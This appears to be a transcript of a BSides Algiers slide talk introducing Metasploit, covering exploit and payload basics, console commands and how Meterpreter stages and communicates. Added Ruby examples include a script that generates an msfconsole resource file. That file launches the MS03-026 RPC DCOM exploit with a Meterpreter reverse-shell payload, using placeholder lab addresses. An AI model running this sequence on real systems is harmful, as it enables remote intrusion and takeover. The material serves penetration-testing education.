BSides Algiers - Metasploit framework - Oussama Elhamer
Published in: Technology, Education

  1. The Metasploit Framework, by Elhamer Oussama Abdelkhalek
  2. Contents:
     • Introduction:
       I. Basics.
       II. Running an attack the old-fashioned way.
       III. Overview of the Metasploit project and framework.
       IV. Running the same attack using Metasploit.
     • Metasploit overview and basic framework usage:
       I. Metasploit architecture.
       II. Consoles.
     • Meterpreter basics and overview.
  3. Exploitation!
     • Vulnerability: a weakness which allows an attacker to break through a system's security.
     • Exploit: code which allows an attacker to take advantage of a vulnerable system.
     • Payload: code that runs on the system after exploitation.
  4. (Diagram) Vulnerability, Exploit, Payload.
  5. (Diagram) Attacker sends Exploit + Payload to the Vulnerable System.
     1. The exploit runs first.
     2. The payload runs next, if the exploit succeeded (for example data download, uploading malware, ...).
  6. Running an exploit the old-fashioned way.
     • The vulnerability: RPC DCOM, a buffer overflow in the RPC interface (MS03-026).
     • The exploit and the payload are publicly available.
  7. The problem!
     • A lot of exploits!
     • Hard to customise the payload.
     • Testing exploits and doing exploit research is painful!
     • Metasploit is a shortcut.
  8. What is Metasploit?
     • Metasploit has come to be synonymous with the Metasploit Framework.
     • The Metasploit Project's goal is to provide information that is useful in:
       I. Penetration testing.
       II. IDS signature development.
       III. Exploit research.
     • Developed by H.D. Moore in 2003, then acquired by Rapid7.
     • Primarily written in Perl, then rewritten in Ruby (at the time described as the largest program ever written in Ruby!).
     • The framework is an open-source platform for developing, testing and using exploit code.
     • The current "stable" version, at the time of this talk, is version 4.
     • Similar to the commercial products Canvas (Immunity) and Impact (Core).
  9. Benefits
     • Over 600 tested exploits and 200 payloads!
     • Plug and play of payloads with exploits: match the payload to the exploit, and try different payloads with the same exploit code.
     • Lots of tools and features for better and faster pentests.
  10. Using Metasploit
     • show: list the available modules (exploits, payloads, etc.).
     • use: select a specific exploit module.
     • set: set a specific variable (variable names are case sensitive).
     • RHOST: remote host (the target we're attacking).
     • PAYLOAD: the payload to deliver.
     • LHOST: local host (for phone-home attacks, i.e. a reverse shell).
     • exploit: run the exploit.
     • RPC DCOM using Metasploit.
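The use / set / exploit sequence from this slide, as an added example that is not from the talk or from Metasploit itself: a Ruby script that prints an msfconsole resource script for the RPC DCOM module and checks the exploit/payload pairing before anything is run. The module and payload names are the current Metasploit names for this exploit (exploit/windows/dcerpc/ms03_026_dcom and windows/meterpreter/reverse_tcp); the 192.0.2.x addresses are placeholders for a lab network, and the validation logic is this example's own, not something msfconsole does for you.

```ruby
# Added example (not from the slides): build an msfconsole resource script that
# automates the "use / set / exploit" sequence for the RPC DCOM module and
# checks the payload pairing first. Assumptions: the module and payload names
# below are the current Metasploit names; the addresses are lab placeholders.

require 'ipaddr'

EXPLOIT = 'exploit/windows/dcerpc/ms03_026_dcom'   # MS03-026 RPC DCOM overflow
PAYLOAD = 'windows/meterpreter/reverse_tcp'

# Option names are case sensitive in msfconsole ("set rhost" sets an unused
# variable instead of erroring), so they are kept upper case here.
def build_resource_script(exploit:, payload:, rhost:, lhost:, lport: 4444)
  IPAddr.new(rhost)                              # raises IPAddr::InvalidAddressError on typos
  IPAddr.new(lhost)
  exploit_platform = exploit.split('/')[1]       # "windows" from exploit/windows/...
  payload_platform = payload.split('/')[0]       # "windows" from windows/...
  unless exploit_platform == payload_platform
    raise ArgumentError, "payload #{payload} does not match exploit platform #{exploit_platform}"
  end
  lines = ["use #{exploit}", "set RHOST #{rhost}", "set PAYLOAD #{payload}"]
  # A reverse payload phones home, so it needs LHOST/LPORT; a bind payload
  # (e.g. windows/shell/bind_tcp) listens on the target and needs neither.
  if payload.include?('reverse')
    lines << "set LHOST #{lhost}" << "set LPORT #{lport}"
  end
  lines << 'exploit'
  lines.join("\n") + "\n"
end

if __FILE__ == $PROGRAM_NAME
  puts build_resource_script(exploit: EXPLOIT, payload: PAYLOAD,
                             rhost: '192.0.2.10', lhost: '192.0.2.2')
end
```

Run it as `ruby build_rc.rb > ms03_026.rc` and then `msfconsole -q -r ms03_026.rc`. Recent Metasploit releases name the target option RHOSTS (RHOST is kept as an alias); `show options` after `use` lists what the module actually expects, and LHOST must be an address the target can reach, not a NATed one.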
  11. Using Metasploit: (demo)
  12. Metasploit architecture: (diagram)
  13. Meterpreter
     • What we are looking for is a payload which:
       - avoids creating a new process;
       - runs in the exploited process's context;
       - does not create a new file on disk;
       - can import more functionality (is extensible) rather than being limited to the commands of the remote shell it creates.
     • That is exactly what Meterpreter does!
  14. Meterpreter basics
     • Post-exploitation tool.
     • Works by in-memory DLL injection.
     • Does not create any files on disk.
     • Uses encrypted communication between the Meterpreter server on the victim and the attacker's client.
     • Stable, flexible and extensible!
     • Can be extended at runtime by shipping DLLs to the victim.
  15. How it works
     • When the exploit succeeds:
     • the exploit runs and executes the first-stage payload;
     • the payload connects back to MSF;
     • the second-stage DLL injection payload is sent;
     • MSF sends the Meterpreter server DLL;
     • client and server communicate.
  16. Using Meterpreter
     • DEMO
  17. Client/server communication in Meterpreter
     • The communication is encrypted.
     • Messages are in the form of TLVs (Type, Length, Value).
     • So multiple channels of communication can share the same client/server connection.
     • This allows multiple programs running on the victim to communicate at the same time.
     • Demo.
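A simplified type-length-value codec, added here as an illustration and not taken from the slides or from Meterpreter's source: it follows the [length][type][value] layout with big-endian 32-bit fields and a length that counts the 8-byte header, and tags each packet with a channel id so two programs on the victim can share one connection, as the slide describes. The type numbers are made up for the example, and the packet header, session bookkeeping and the encryption the slide mentions are left out, so this is a model of the multiplexing idea rather than a wire-compatible implementation.

```ruby
# Added example (not the slides' or Metasploit's own code): a simplified TLV
# codec in the style of Meterpreter's [length:4][type:4][value] layout, both
# fields big-endian and the length including the 8-byte header. The type ids
# are hypothetical; the real packet header and encryption are omitted.

HEADER_LEN = 8

# Hypothetical type ids for this demo (not Meterpreter's constants).
TYPE_CHANNEL_ID = 0x0001   # 32-bit unsigned channel number
TYPE_DATA       = 0x0002   # raw bytes carried on that channel
TYPE_METHOD     = 0x0003   # string naming the request, e.g. "fs_ls"

def encode_tlv(type, value)
  bytes = value.is_a?(Integer) ? [value].pack('N') : value.b
  [HEADER_LEN + bytes.bytesize, type].pack('NN') + bytes
end

# Decode every TLV in buf. Truncated or inconsistent lengths raise instead of
# reading past the end of the buffer (the classic TLV parser bug).
def decode_tlvs(buf)
  buf = buf.b
  tlvs = []
  off = 0
  while off < buf.bytesize
    raise "truncated header at #{off}" if buf.bytesize - off < HEADER_LEN
    len, type = buf[off, HEADER_LEN].unpack('NN')
    raise "bad length #{len} at #{off}" if len < HEADER_LEN || off + len > buf.bytesize
    value = buf[off + HEADER_LEN, len - HEADER_LEN]
    value = value.unpack1('N') if type == TYPE_CHANNEL_ID
    tlvs << [type, value]
    off += len
  end
  tlvs
end

# One "packet" = a channel id, a method and a data TLV, so several programs on
# the victim can share the single client/server connection.
def encode_packet(channel, method, data)
  encode_tlv(TYPE_CHANNEL_ID, channel) +
    encode_tlv(TYPE_METHOD, method) +
    encode_tlv(TYPE_DATA, data)
end

# Split a stream of back-to-back packets by channel:
# {channel => [[method, data], ...]} in arrival order.
def demux(stream)
  tlvs = decode_tlvs(stream)
  raise 'stream is not a whole number of packets' unless tlvs.size % 3 == 0
  out = Hash.new { |h, k| h[k] = [] }
  tlvs.each_slice(3) do |(t1, chan), (t2, method), (t3, data)|
    raise 'unexpected TLV order' unless [t1, t2, t3] == [TYPE_CHANNEL_ID, TYPE_METHOD, TYPE_DATA]
    out[chan] << [method, data]
  end
  out
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: a shell (channel 1) and a directory listing (channel 2)
  # interleaved on one connection.
  stream = encode_packet(1, 'shell_write', "whoami\n") +
           encode_packet(2, 'fs_ls', 'C:\\Users') +
           encode_packet(1, 'shell_read', "nt authority\\system\n")
  p demux(stream)
end
```

The length check before the slice is the part worth copying: a server that trusts the length field of an attacker-supplied TLV will read or allocate past the buffer, which is why the encryption the slide mentions only protects the transport and not the parser.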